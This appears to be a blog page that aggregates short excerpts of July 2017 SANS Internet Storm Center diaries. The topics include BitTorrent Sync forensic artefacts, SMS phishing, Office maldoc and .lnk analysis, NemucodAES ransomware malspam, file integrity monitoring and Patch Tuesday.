Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 4 ? Windows Thumbnail Cache, Registry, Prefetch Files, and Link Files artefacts), (Tue, Jul 18th)

by nateSecurity BulletinsPosted on Comments are Disabled

[This is fourth guest diary by Dr.Ali Dehghantanha. Previous diaries in the series are: Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud (Part 1) Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 2 ? Log Files artefacts) Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 3 ? Physical …

Read more “Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 4 ? Windows Thumbnail Cache, Registry, Prefetch Files, and Link Files artefacts), (Tue, Jul 18th)”

SMS Phishing induces victims to photograph its own token card, (Sun, Jul 16th)

by nateSecurity BulletinsPosted on Comments are Disabled

Introduction Today I faced quite an unusual SMS phishing campaign here in Brazil. A friend of mine received a SMS message supposedly sent from his bank asking him to update his registration data through the given URL. Otherwise, he could have his account blocked, as seen in Figure 1. width:250px” /> Figure 1 SMS message …

Read more “SMS Phishing induces victims to photograph its own token card, (Sun, Jul 16th)”

Office maldoc + .lnk, (Sat, Jul 15th)

by nateSecurity BulletinsPosted on Comments are Disabled

Reader nik submitted a malicious document. It width:867px” /> It width:852px” /> And then we can use Woanware width:829px” /> Unfortunately, the .lnk file does not contain interesting metadata. But we can see that it uses PowerShell to download an executable from Dropbox. Didier Stevens Microsoft MVP Consumer Security blog.DidierStevens.com DidierStevensLabs.com (c) SANS Internet Storm …

Read more “Office maldoc + .lnk, (Sat, Jul 15th)”

NemucodAES and the malspam that distributes it, (Fri, Jul 14th)

by nateSecurity BulletinsPosted on Comments are Disabled

Introduction During the past two weeks or so, Ive noticed a significant increase in malicious spam (malspam) with attached zip archives disguised as delivery notices from the United Parcel Service (UPS). These zip archives contain JavaScript files designed to download and install NemucodAES ransomware and Kovter malware on a victims Windows computer. My Online Security …

Read more “NemucodAES and the malspam that distributes it, (Fri, Jul 14th)”

Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 3 ? Physical Memory artefacts), (Thu, Jul 13th)

by nateSecurity BulletinsPosted on Comments are Disabled

[This is third guest diary by Dr.Ali Dehghantanha. You can find his first diaryhereand second here. If you would like to propose a guest diary, please let us know] Continuing my earlier posts on investigation of BitTorrent Sync version 2.0, this post explains remaining artefacts of user activities in physical memory of Windows 8.1, Mac …

Read more “Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 3 ? Physical Memory artefacts), (Thu, Jul 13th)”

Backup Scripts, the FIM of the Poor, (Wed, Jul 12th)

by nateSecurity BulletinsPosted on Comments are Disabled

File Integrity Management or FIM is an interesting security control that can help to detect unusual changes in a file system. By example, on a server, they are directories that do not change often. Example with a UNIX environment: Binaries libraries in /usr/lib, /usr/bin, /bin, /sbin, /usr/local/bin, … Configuration files in /etc Devices files in …

Read more “Backup Scripts, the FIM of the Poor, (Wed, Jul 12th)”

July's Microsoft Patch Tuesday, (Tue, Jul 11th)

by nateSecurity BulletinsPosted on Comments are Disabled

TodaysMicrosoft Patch Tuesdayfixes critical and important flaws that, if exploited, could give an attacker a range of possibilities – from privilege escalation to remote code execution (RCE) – on different Windows OS and Microsoft Office versions. One that caught my attention was the RCE which affects the Windows Search service [1] and may allow an …

Read more “July's Microsoft Patch Tuesday, (Tue, Jul 11th)”

Basic Office maldoc analysis, (Mon, Jul 10th)

by nateSecurity BulletinsPosted on Comments are Disabled

Malicious Office documents come in all type of flavors, sometimes very simple: they contain just an embedded file (for example an EXE), without any script or exploit to automatically launch the embedded file. The user is persuaded through social engineering to extract and execute the embedded file. Analyzing such files in a sandbox will often …

Read more “Basic Office maldoc analysis, (Mon, Jul 10th)”

Adversary hunting with SOF-ELK, (Sun, Jul 9th)

by nateSecurity BulletinsPosted on Comments are Disabled

As we recently celebrated Independence Day in the U.S., Im reminded that we honor what was, of course, an armed conflict. Todays realities, when we think about conflict, are quite different than the days of lining troops up across the field from each other, loading muskets, and flinging balls of lead into the fray. We …

Read more “Adversary hunting with SOF-ELK, (Sun, Jul 9th)”

A VBScript with Obfuscated Base64 Data, (Sat, Jul 8th)

by nateSecurity BulletinsPosted on Comments are Disabled

A few months ago, I posted a diary to explain how to search for (malicious) PE files in Base64 data[1]. Base64 is indeed a common way to distribute binary content in an ASCII form. There are plenty of scripts based on this technique. On my Macbook, Im using width:800px” /> But yesterday, I found, on …

Read more “A VBScript with Obfuscated Base64 Data, (Sat, Jul 8th)”